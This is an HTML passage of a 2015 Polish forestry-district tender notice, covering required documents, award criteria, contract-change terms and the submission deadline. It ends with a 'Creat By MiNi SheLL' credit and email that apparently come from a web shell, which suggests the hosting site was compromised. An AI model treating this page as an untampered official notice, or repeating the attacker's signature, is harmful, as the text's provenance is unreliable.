<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - gwarancja - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>16.3.	Istotne zmiany postanowień niniejszej Umowy w stosunku do treści oferty Wykonawcy, możliwe są w następującym zakresie i przy zaistnieniu poniższych przesłanek:
zmiana wynagrodzenia Wykonawcy w przypadku zmiany przepisów prawa podatkowego, w szczególności zmiany stawki podatku od towarów i usług,
zmiana terminu wykonania Przedmiotu Umowy lub jego poszczególnych etapów możliwa jest w następujących przypadkach:
a)	złożenia przez Wykonawcę wniosku o skrócenie terminu wykonania Przedmiotu Umowy, jeżeli skrócenie tego terminu nie wpłynie negatywnie na należyte wykonanie Przedmiotu Umowy,
b)przedłużenia się procedury udzielenia przedmiotowego zamówienia publicznego poprzez środki ochrony prawnej, wykorzystywane przez wykonawców lub inne podmioty,
c)wystąpienia działań i zaniechań instytucji zaangażowanych w realizację, kontrolę lub finansowanie zamówienia,
d)działania siły wyższej, za którą uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu Umowy, a których Strony nie były w stanie przewidzieć w momencie jej zawierania i których zaistnienie lub skutki uniemożliwiają wykonanie Umowy zgodnie z jej treścią, w szczególności powódź, deszcz nawalny, pożar; Strona powołująca się na stan siły wyższej jest zobowiązana do niezwłocznego pisemnego powiadomienia drugiej Strony, a następnie do udokumentowania zaistnienia tego stanu,
e)wystąpienia warunków atmosferycznych i klimatycznych uniemożliwiających realizację Przedmiotu Umowy w stopniu większym niż można byłoby to racjonalnie przewidywać,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kliniska.szczecin.lasyl.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Kliniska
Pucko 1
72-123 Kliniska Wielkie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2015 godzina 08:30, miejsce: Nadleśnictwo Kliniska
Pucko 1
72-123 Kliniska Wielkie
SEKRETARIAT  - biuro nr 6.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com